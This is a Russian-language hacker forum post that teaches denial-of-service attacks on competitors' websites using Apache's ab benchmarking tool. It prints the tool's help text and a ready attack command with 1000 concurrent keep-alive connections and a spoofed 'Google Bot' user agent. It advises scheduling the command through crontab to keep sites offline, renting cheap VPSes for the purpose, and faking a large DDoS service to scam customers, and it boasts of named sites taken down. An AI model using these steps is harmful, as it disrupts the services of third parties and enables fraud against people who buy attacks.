DOS сайтов или как завалить сайт конкурента с одного удара!

Zams

cYph3rp4nk
181
156
9 Ноя 2016
Данный метод DOS иногда применяют для развода тех, кто хочет заказать реальный DDOS сайта конкурента.

Системные администраторы конечно знают, но многие обычные юзеры нет, что у апача есть забавная утилитка для стресс тестирования. Зовется очень просто ab

ab -h

выдает что то вроде этого:

Код:
[== PHP ==]
[email protected]:~# ab -h
Usage: ab [options] [http[s]://]hostname[:port]/path
Options are:
    -n requests     Number of requests to perform
    -c concurrency  Number of multiple requests to make
    -t timelimit    Seconds to max. wait for responses
    -b windowsize   Size of TCP send/receive buffer, in bytes
    -p postfile     File containing data to POST. Remember also to set -T
    -u putfile      File containing data to PUT. Remember also to set -T
    -T content-type Content-type header for POSTing, eg.
                    'application/x-www-form-urlencoded'
                    Default is 'text/plain'
    -v verbosity    How much troubleshooting info to print
    -w              Print out results in HTML tables
    -i              Use HEAD instead of GET
    -x attributes   String to insert as table attributes
    -y attributes   String to insert as tr attributes
    -z attributes   String to insert as td or th attributes
    -C attribute    Add cookie, eg. 'Apache=1234. (repeatable)
    -H attribute    Add Arbitrary header line, eg. 'Accept-Encoding: gzip'
                    Inserted after all normal header lines. (repeatable)
    -A attribute    Add Basic WWW Authentication, the attributes
                    are a colon separated username and password.
    -P attribute    Add Basic Proxy Authentication, the attributes
                    are a colon separated username and password.
    -X proxy:port   Proxyserver and port number to use
    -V              Print version number and exit
    -k              Use HTTP KeepAlive feature
    -d              Do not show percentiles served table.
    -S              Do not show confidence estimators and warnings.
    -g filename     Output collected data to gnuplot format file.
    -e filename     Output CSV file with percentages served
    -r              Don't exit on socket receive errors.
    -h              Display usage information (this message)
    -Z ciphersuite  Specify SSL/TLS cipher suite (See openssl ciphers)
    -f protocol     Specify SSL/TLS protocol (SSL3, TLS1, or ALL)
[email protected]:~#
С помощью этой очень простой утилитки можно запустить хуеву тучу поноса на определенный сайт с различными параметрами.

Например, ab -n 100000 -c 1000 -r -k -H "User-Agent: Google Bot" Для просмотра ссылки Войди или Зарегистрируйся

Апач запустить 1000 одновременных соединений к цели и будет пытаться сделать 100000 запросов. При этом стараться все соединения держать keep-alive и не обрывать процесс при возникновении ошибки. Дополнительно в заголовках передаем User-Agent - в логах атакуемого сервака будет отображаться Google Bot.

Просто и эффективно для вывода сайта в оффлайн на короткий промежуток времени.

Когда тулза закончит работу, она покажет сколько было занято времени на тестирование, сколько пакетов в секунду улетало, ну и другая инфа.

Далее, зная, что по данному сайту прога отрабатывает например 100000 соединений за 5 минут, можно прописать запуск скрипта в кронтаб на каждые 10 минут. В итоге пока админы не поймут че за херня творится с сайтом, сайт будет в оффлайне.

Все что вам нужно, это VPS сервак с рут доступом. Без администрирования со стороны хостера такие серваки стоят от 3 до 15 баксов за год! Кто ищет тот обрящет. В гугле cheap unmanaged vps

Как я написал вначале многие юзают эту тулзу для развода заказчиков на DDOS. Ведь нам надо только продемонстрировать, что у нас охуенные мега ддос сервис в 500 гб.

Тулза особенно эффективная против различных скриптов, которые делают много запросов к базе данных - в этом случае быстрее всего улетает в оффлайн mysql сервак.

Ну и напоследок пример ударов по различным сайтам из рейтинга топ маил ру

Для просмотра ссылки Войди или Зарегистрируйся - посещаемость примерно 900 тыс. юзеров в месяц - упал сразу
Для просмотра ссылки Войди или Зарегистрируйся - книжный интернет магазин, посещаемость около 27 тыс. юзеров в месяц - упал сразу

Методика действует супротив любых проектов, кромe тех кто под антиддос защитой и тех, где встречаются в природе грамотные сисадмины.